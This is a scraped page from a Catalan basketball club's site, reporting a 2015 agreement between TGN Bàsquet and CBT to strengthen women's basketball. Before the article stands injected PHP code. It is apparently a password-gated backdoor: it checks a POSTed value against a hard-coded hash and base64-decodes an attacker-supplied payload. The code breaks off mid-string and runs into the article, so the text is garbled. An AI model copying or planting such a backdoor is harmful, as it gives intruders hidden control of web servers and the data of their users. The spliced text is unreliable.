function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet i el CBT signen un acord sense precedents per potenciar el bàsquet femení - Tgn Bàsquet Club -

El TGN Bàsquet i el CBT signen un acord sense precedents per potenciar el bàsquet femení

By
Updated: juliol 13, 2015

Avui és un dia important per la història del bàsquet tarragoní, un dia històric. El TGN Bàsquet Club i el Club Bàsquet Tarragona (CBT) han segellat aquesta tarda un acord que pretén potenciar el bàsquet femení gràcies a la col·laboració entre ambdues entitats. Així, el CBT cedeix la seva plaça de Copa Catalunya Femenina al TGN Bàsquet Club que tindrà, d’aquesta manera, dos equips sèniors: el de Copa Catalunya i un altre a Primera Catalana, on ha jugat les últimes temporades. La cessió ha estat a cost zero i el club lila només ha hagut de pagar la inscripció federativa, que ha estat de 1.200 euros. L’acord provoca que els equips sèniors -ara sota filiació federativa del TGN Bàsquet- estiguin formats per les jugadores d’ambdós clubs a l’espera de possibles noves incorporacions. L’entrenador del conjunt de Copa Catalunya serà Albert del Rey, que entrenava el CBT femení el curs passat i que va aconseguir l’ascens, el seu ajudant serà Jordi Crespo, entrenador del TGN Bàsquet. El conjunt de Primera Catalana serà entrenat per Sergi Farré.

L’acord, que té una vigència de dues temporades però que es pretén que es vagi renovant, preveu també que els conjunts júnior i cadet femenins estiguin sota filiació del CBT. Així, el júnior estarà entrenat per Pep Garcia i el cadet per David Garcia. Els conjunts sèniors vestiran la samarreta lila del TGN Bàsquet i jugaran al pavelló del Sagrat Cor, mentre que el júnior i el cadet vestiran de blau i jugaran al Serrallo. Amb tot, la voluntat és integrar les dinàmiques dels quatre equips entre els dos clubs i els equips sèniors entrenaran un parell de dies al Sagrat Cor i un al Serrallo mentre que el júnior i el cadet entrenaran un parell de dies al Serrallo i un al Sagrat Cor.

En principi es vol trobar un nom comú pels quatre equips, tot i que jugaran, tal com s’ha explicat abans, amb els colors de cada entitat. “S’està treballant perquè tots aquests quatre equips tinguin un nom comú, a partir d’aquí veurem quina és la millor opció”, va dir Aleix Boada, director esportiu del CBT, en relació a la possibilitat que el nom fos el de Tarragona 2017. “Aquest és el començament d’una nova etapa en què fem una aposta ferma pel bàsquet femení. Vull destacar la gran sintonia entre els tècnics dels dos clubs i ambdues juntes directives. Ens hem entès des del començament. És un gran dia”, ha afirmat Josep Maria Adam, president del TGN Bàsquet. Per la seva banda, Loli Salas, presidenta del CBT, també va destacar la importància de l’acord entre ambdues entitats: “Els dos clubs feia molt de temps que, en l’apartat tècnic, no tenien bona relació. Avui hem aparcat aquestes diferències per fer que el bàsquet femení en categoria sènior pugui aconseguir grans fites. No ens ha costat parlar perquè el més important és el bàsquet i he d’agrair al TGN Bàsquet les converses que hem tingut”.

El vicepresident del TGN Bàsquet i màxim responsable esportiu dels equips sènior, Iñaki Liarte, va afirmar que ja s’havien fet entrenaments i que s’estava treballant en la confecció de les plantilles: “Ja s’estan fent entrenaments. S’ha creat un apartat tècnic que treballa en aquest àmbit i el formen dues persones de cada club”. Aleix Boada va anar més enllà quan va destacar la importància del conveni per la ciutat de Tarragona: “Busquem una mica més de rendiment. El que surt guanyant és el bàsquet de la ciutat de Tarragona. Esperem que aquest pas endavant ens ajudi a millorar tant en la branca femenina com en la branca masculina”.
Per la seva banda, el director de l’escola Vedruna Sagrat Cor, bressol del TGN Bàsquet, va voler aprofitar l’acte per valorar l’esforç fet pel club lila i el CBT: “És hora de començar a unificar esforços i treballar per projectes comuns. Estem interessats per la formació acadèmica dels nostres alumnes però també la formació esportiva”.

 

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *